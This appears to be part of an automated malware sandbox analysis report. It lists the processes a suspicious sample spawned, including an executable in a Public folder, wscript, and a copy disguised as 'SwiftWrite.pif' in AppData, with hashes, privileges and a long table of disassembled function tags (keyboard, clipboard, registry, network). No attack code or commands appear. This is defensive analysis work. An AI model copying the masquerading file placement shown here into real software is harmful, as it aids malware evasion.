Has exited: | true |
Target ID: | 5 |
Start time: | 09:00:50 |
Start date: | 27/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 09:00:55 |
Start date: | 27/12/2024 |
Path: | C:\Users\Public\Guard.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x130000 |
File size: | 893'608 bytes |
MD5 hash: | 18CE19B57F43CE0A5AF149C96AECC685 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | moderate |
Has exited: | false |
Target ID: | 7 |
Start time: | 09:00:57 |
Start date: | 27/12/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc50000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 09:00:57 |
Start date: | 27/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 09:01:07 |
Start date: | 27/12/2024 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75ab80000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 09:01:08 |
Start date: | 27/12/2024 |
Path: | C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8c0000 |
File size: | 893'608 bytes |
MD5 hash: | 18CE19B57F43CE0A5AF149C96AECC685 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Has exited: | false |
Execution Graph
Execution Coverage: | 2.5% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 10.3% |
Total number of Nodes: | 1520 |
Total number of Limit Nodes: | 44 |
Graph
Function 00007FF69DB337B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
Function 00007FF69DB36580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
Function 00007FF69DB51D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
Function 00007FF69DBCF630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
Function 00007FF69DBAC7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
Function 00007FF69DB37920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
Function 00007FF69DB35DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
Function 00007FF69DB33D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
Function 00007FF69DB4E958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
Function 00007FF69DB33B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
Function 00007FF69DB425BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
Function 00007FF69DB33CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
Function 00007FF69DB37EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
Function 00007FF69DB372C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
Function 00007FF69DB33F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
Function 00007FF69DB54610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
Function 00007FF69DB466C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
Function 00007FF69DB6B3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
Function 00007FF69DB6C51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
Function 00007FF69DBC56A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
Function 00007FF69DBE17C0 Relevance: 70.6, APIs: 38, Strings: 2, Instructions: 587windowkeyboardCOMMON
Function 00007FF69DBDCE8C Relevance: 69.5, APIs: 46, Instructions: 540windowCOMMON
Function 00007FF69DBDBA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
Function 00007FF69DBDDB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
Function 00007FF69DBC32AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
Function 00007FF69DB3183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
Function 00007FF69DB9CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
Function 00007FF69DB32AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
Function 00007FF69DBC0A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
Function 00007FF69DBDC6D4 Relevance: 28.9, APIs: 19, Instructions: 396windowCOMMON
Function 00007FF69DB7529C Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
Function 00007FF69DBD0AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
Function 00007FF69DB35F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
Function 00007FF69DBB72A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON
Function 00007FF69DBAD87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66COMMON
Function 00007FF69DBA7E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
Function 00007FF69DBB3E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
Function 00007FF69DBD055C Relevance: 16.9, APIs: 11, Instructions: 371registryCOMMON
Function 00007FF69DBB59D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
Function 00007FF69DBDA59C Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
Function 00007FF69DBC0D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON
Function 00007FF69DBAB7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171fileCOMMON
Function 00007FF69DB72650 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE
Function 00007FF69DBC3940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
Function 00007FF69DBABC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
Function 00007FF69DB6AF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
Function 00007FF69DBB5F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
Function 00007FF69DB6793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
Function 00007FF69DB72D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
Function 00007FF69DBAD750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON
Function 00007FF69DB55BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
Function 00007FF69DBC7634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
Function 00007FF69DB42E30 Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1264COMMON
Function 00007FF69DB61750 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
Function 00007FF69DB72F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
Function 00007FF69DB6BEF8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23timeCOMMON
Function 00007FF69DBBE968 Relevance: 3.1, APIs: 2, Instructions: 97networkfileCOMMON
Function 00007FF69DB695B0 Relevance: 2.9, Strings: 2, Instructions: 378COMMONLIBRARYCODE
Function 00007FF69DB92BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
Function 00007FF69DB5C130 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
Function 00007FF69DB5BEB4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
Function 00007FF69DB458D0 Relevance: .7, Instructions: 692COMMON
Function 00007FF69DB3B390 Relevance: .7, Instructions: 682COMMON
Function 00007FF69DB3B9F0 Relevance: .6, Instructions: 577COMMON
Function 00007FF69DB630DC Relevance: .5, Instructions: 535COMMON
Function 00007FF69DB76DE4 Relevance: .2, Instructions: 194COMMON
Function 00007FF69DBB1A18 Relevance: .1, Instructions: 66COMMON
Function 00007FF69DB6FD20 Relevance: .0, Instructions: 32COMMON
Function 00007FF69DB559C8 Relevance: .0, Instructions: 2COMMON
Function 00007FF69DBDE95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
Function 00007FF69DBB4F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON
Function 00007FF69DBDECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
Function 00007FF69DBD6EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON
Function 00007FF69DBA2C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON
Function 00007FF69DBD6608 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 475windowCOMMON
Function 00007FF69DBE1254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
Function 00007FF69DBB3FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
Function 00007FF69DBE0118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
Function 00007FF69DBB0D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
Function 00007FF69DBB8BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON
Function 00007FF69DBC4F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
Function 00007FF69DB9B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
Function 00007FF69DBD1110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
Function 00007FF69DBB3268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
Function 00007FF69DBA74B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
Function 00007FF69DBAD4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65sleepwindowtimeCOMMON
Function 00007FF69DBB4708 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 339COMMON
Function 00007FF69DB9FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
Function 00007FF69DBA176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226COMMON
Function 00007FF69DB31504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
Function 00007FF69DBB34E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
Function 00007FF69DB9C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
Function 00007FF69DBDAD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
Function 00007FF69DBA7BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
Function 00007FF69DBC66B4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182comCOMMON
Function 00007FF69DBC2A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON
Function 00007FF69DB6D504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
Function 00007FF69DBA76D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
Function 00007FF69DB9E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
Function 00007FF69DBACA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON
Function 00007FF69DBE0D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
Function 00007FF69DB9F7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471COMMON
Function 00007FF69DBC767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
Function 00007FF69DB9D780 Relevance: 13.6, APIs: 9, Instructions: 54memorythreadCOMMON
Function 00007FF69DBE0B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
Function 00007FF69DBCE580 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
Function 00007FF69DBAA070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
Function 00007FF69DBAAD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
Function 00007FF69DBAC5C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
Function 00007FF69DBCFCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
Function 00007FF69DB70BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
Function 00007FF69DBBDBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
Function 00007FF69DBC37A8 Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
Function 00007FF69DBD15C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
Function 00007FF69DBDAEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
Function 00007FF69DBAFAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
Function 00007FF69DBAF9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
Function 00007FF69DB5A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
Function 00007FF69DBAD1F0 Relevance: 9.1, APIs: 6, Instructions: 131filestringCOMMON
Function 00007FF69DB3D4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
Function 00007FF69DBADA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
Function 00007FF69DB9F378 Relevance: 9.0, APIs: 6, Instructions: 33threadwindowtimeCOMMON
Function 00007FF69DB9D868 Relevance: 9.0, APIs: 6, Instructions: 22memorysynchronizationCOMMON
Function 00007FF69DBC7E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
Function 00007FF69DBCCDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
Function 00007FF69DBA0EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
Function 00007FF69DBA9898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
Function 00007FF69DB69B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
Function 00007FF69DBAB62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
Function 00007FF69DB9DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
Function 00007FF69DBBD914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
Function 00007FF69DBD93E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
Function 00007FF69DB59164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
Function 00007FF69DB789B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
Function 00007FF69DB6ED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
Function 00007FF69DB6E67C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
Function 00007FF69DBD0084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
Function 00007FF69DBCD0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
Function 00007FF69DB72998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
Function 00007FF69DB31CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
Function 00007FF69DB6BA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
Function 00007FF69DB9D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
Function 00007FF69DB6F9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
Function 00007FF69DBA2ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
Function 00007FF69DBB0008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
Function 00007FF69DBB6D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
Function 00007FF69DB70040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
Function 00007FF69DB5B1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
Function 00007FF69DB9EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
Function 00007FF69DBAA6BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
Function 00007FF69DB6EAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
Function 00007FF69DBDB454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
Function 00007FF69DBDAB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
Function 00007FF69DBDB798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
Function 00007FF69DBB4DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
Function 00007FF69DBDB104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
Function 00007FF69DB9F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
Function 00007FF69DBAC110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
Function 00007FF69DBCAF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
Function 00007FF69DB36D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
Function 00007FF69DBD10C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
Function 00007FF69DB36D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
Function 00007FF69DBA32F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
Function 00007FF69DB6C72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
Function 00007FF69DBA8B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
Function 00007FF69DBA8CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
Function 00007FF69DBA50E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
Function 00007FF69DBACF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
Function 00007FF69DB6B778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
Function 00007FF69DB6CC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
Function 00007FF69DBA1D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
Function 00007FF69DB6D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
Function 00007FF69DB6A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
Function 00007FF69DBD9E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
Function 00007FF69DBC5E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
Function 00007FF69DBDB224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
Function 00007FF69DB6DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
Function 00007FF69DBDA0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
Function 00007FF69DBD9868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
Function 00007FF69DBD9BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
Function 00007FF69DB6FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
Function 00007FF69DB9DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
Function 00007FF69DB9DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
Function 00007FF69DB9DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
Function 00007FF69DBBE708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47networkCOMMON
Function 00007FF69DBDFEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
Function 00007FF69DB9DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
Function 00007FF69DB715B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
Function 00007FF69DB714FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
Function 00007FF69DB714E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
Function 00007FF69DB71370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
Function 00007FF69DB9C59C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON
Function 00007FF69DB575C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
Function 00007FF69DB55620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON